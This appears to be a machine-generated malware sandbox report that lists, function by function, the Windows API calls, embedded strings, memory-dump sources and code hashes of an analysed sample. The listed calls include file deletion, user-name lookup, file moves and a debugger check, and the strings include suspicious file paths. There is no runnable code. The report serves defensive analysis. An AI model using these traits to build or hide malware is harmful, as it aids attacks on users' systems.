                                                                                                  Similarity
                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                  • String ID: 0$LPCWSTRszWindowClass
                                                                                                  • API String ID: 1693014935-1496217519
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                                  Strings
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendDeleteFileFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 610490371-2616962270
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove_strtok
                                                                                                  • String ID:
                                                                                                  • API String ID: 3446180046-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                                                                                                  • __isleadbyte_l.LIBCMT ref: 0043C6DB
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                  • String ID:
                                                                                                  • API String ID: 3058430110-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                                                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleWritelstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1421093161-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 004C70AB
                                                                                                    • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                                                                                                    • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                                                                                                  • CallCatchBlock.LIBCMT ref: 004C70F8
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                                                                                                    • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                                                                                                  • __calloc_crt.LIBCMT ref: 00425A01
                                                                                                    • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                                                                                                  • __lock.LIBCMT ref: 00425A37
                                                                                                  • ___addlocaleref.LIBCMT ref: 00425A43
                                                                                                  • __lock.LIBCMT ref: 00425A57
                                                                                                    • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                  • String ID:
                                                                                                  • API String ID: 2580527540-0
                                                                                                  • Opcode ID: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction ID: 8e8bf19fb99f986105457608807abe9f1de148b308aa0ea96eb71ffb67844566
                                                                                                  • Opcode Fuzzy Hash: 3969c2aeef3154995e76024b80c076f82dc7aa98e25c938a71a0b2bc9f16ca02
                                                                                                  • Instruction Fuzzy Hash: A3018471742720DBD720FFAAA443B1D77A09F40728F90424FF455972C6CE7C49418A6D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenW.KERNEL32 ref: 004127B9
                                                                                                  • _malloc.LIBCMT ref: 004127C3
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 004127CE
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3705855051-0
                                                                                                  • Opcode ID: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                  • Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
                                                                                                  • Opcode Fuzzy Hash: 5f096c3e9bb47512b2e803a95e05f57af227ed284e059a7ec7b69b1753ace984
                                                                                                  • Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32 ref: 00412806
                                                                                                  • _malloc.LIBCMT ref: 00412814
                                                                                                    • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                    • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                    • Part of subcall function 00420C62: HeapAlloc.KERNEL32(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                  • _memset.LIBCMT ref: 0041281F
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00412832
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3705855051-0
                                                                                                  • Opcode ID: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                  • Instruction ID: a3b2a97d17252553cb1267f0baabe0c67c158e4fedc78561389223423b5350a8
                                                                                                  • Opcode Fuzzy Hash: cc716eae1123478769c9b07cafd2d40a616cf11e9764af6c4d9ae2a2154c1c51
                                                                                                  • Instruction Fuzzy Hash: 74E086767011347BE510235B7C8EFAB665CCBC27A5F50012AF615D22D38E941C0185B4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
                                                                                                  • Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
                                                                                                  • Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: .\crypto\asn1\tasn_new.c
                                                                                                  • API String ID: 2102423945-2878120539
                                                                                                  • Opcode ID: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction ID: a01d7b69f66ede694d5e1501cc12839462a5262961aeb872149f1145b0afa5c3
                                                                                                  • Opcode Fuzzy Hash: 71e1991ce2e3632dc73bc3e3216da1e10f6e2bb0c3d1e289869c94216a61690f
                                                                                                  • Instruction Fuzzy Hash: 5D510971342341A7E7306EA6AC82FB77798DF41B64F04442BFA0CD5282EA9DEC44817A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
                                                                                                  • Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
                                                                                                  • Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 0041B1BA
                                                                                                    • Part of subcall function 004111C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 0041120F
                                                                                                    • Part of subcall function 004111C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00411228
                                                                                                    • Part of subcall function 004111C0: CloseHandle.KERNEL32(00000000), ref: 0041123D
                                                                                                    • Part of subcall function 004111C0: MoveFileW.KERNEL32(?,?), ref: 00411277
                                                                                                    • Part of subcall function 0041BA10: LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                                    • Part of subcall function 0041BA10: RegisterClassExW.USER32(00000030), ref: 0041BA73
                                                                                                    • Part of subcall function 0041BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0041B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 0041B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 0041B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction ID: 53fb4cb99f7e95a824910e08ad4bb0dd21933b0d591bc71827c80b4e91f39c04
                                                                                                  • Opcode Fuzzy Hash: 57ecfa34f23d78a1e26d0b496c5de0e3008a9e2e419c5c8680807d27605a0cc3
                                                                                                  • Instruction Fuzzy Hash: 015188715142449BC718FF61CC929EFB7A8BF54348F40482EF446431A2EF78AA9DCB96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .\crypto\err\err.c$unknown
                                                                                                  • API String ID: 0-565200744
                                                                                                  • Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
                                                                                                  • Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
                                                                                                  • Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0042419D
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                  • String ID: i;B
                                                                                                  • API String ID: 2328436684-472376889
                                                                                                  • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                  • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                  • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 0042AC7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: 8Q
                                                                                                  • API String ID: 3761405300-2096853525
                                                                                                  • Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
                                                                                                  • Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
                                                                                                  • Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0
                                                                                                    • Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64
                                                                                                  • _memset.LIBCMT ref: 00413C83
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 1327501947-3788999226
                                                                                                  • Opcode ID: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
                                                                                                  • Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
                                                                                                  • Opcode Fuzzy Hash: f83b383ca6d2919a4d8d247e3e36b4910671b137cc7c3380ba7a871b92ce42e9
                                                                                                  • Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _fputws$CreateDirectory
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2590308727-54166481
                                                                                                  • Opcode ID: 40e4798e336b28033a235bd3e43cee8aacca037ca1920e35a95d8556deac84ca
                                                                                                  • Instruction ID: 548e7949761e073c688dfdb6472f733b12cf2ebad02737ba307de427565b7e5f
                                                                                                  • Opcode Fuzzy Hash: 40e4798e336b28033a235bd3e43cee8aacca037ca1920e35a95d8556deac84ca
                                                                                                  • Instruction Fuzzy Hash: 9911E672A00315EBCF20DF65DC8579A77A0AF10318F10063BED5962291E37A99588BCA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Assertion failed: %s, file %s, line %d, xrefs: 00420E13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt
                                                                                                  • String ID: Assertion failed: %s, file %s, line %d
                                                                                                  • API String ID: 3494438863-969893948
                                                                                                  • Opcode ID: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction ID: 3c5265aa1bf4e9f5ad4874ec33d215fa8746995624eee7e22a7137551c8458fa
                                                                                                  • Opcode Fuzzy Hash: 561489f2e4af6d624f58dbcfcda68910edfdae4a72d1be81448c26c2074ac95f
                                                                                                  • Instruction Fuzzy Hash: 75F0A97130A2218BE734DB75BC51B6A27D5AF22724B51082FF100DA5C2E73C88425699
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00480686
                                                                                                    • Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18
                                                                                                  Strings
                                                                                                  • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E
                                                                                                  • .\crypto\evp\digest.c, xrefs: 00480638
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset_raise
                                                                                                  • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                  • API String ID: 1484197835-3867593797
                                                                                                  • Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
                                                                                                  • Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
                                                                                                  • Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 0044F251
                                                                                                    • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0044F266
                                                                                                    • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM
                                                                                                  • API String ID: 757275642-2215902641
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%